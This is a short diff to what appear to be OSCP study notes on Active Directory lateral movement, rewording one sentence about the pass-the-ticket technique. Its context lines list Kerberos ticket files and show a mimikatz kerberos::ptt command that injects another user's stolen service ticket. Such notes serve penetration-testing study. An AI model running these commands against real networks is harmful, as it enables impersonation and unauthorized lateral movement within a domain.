leoanggal1/OSCP-NOTES/WINDOWS/ACTIVE DIRECTORY/LATERAL MOVEMENT SOME TOOLS/PASS THE TICKET.md

 dir *.kirbi
 ```

-we can just pick any TGS ticket in the dave@cifs-web04.kirbi format and inject it through mimikatz via the kerberos::ptt command.
+we can just pick any TGS ticket in the kirbi format and inject it through mimikatz via the kerberos::ptt command.

 ```
 mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi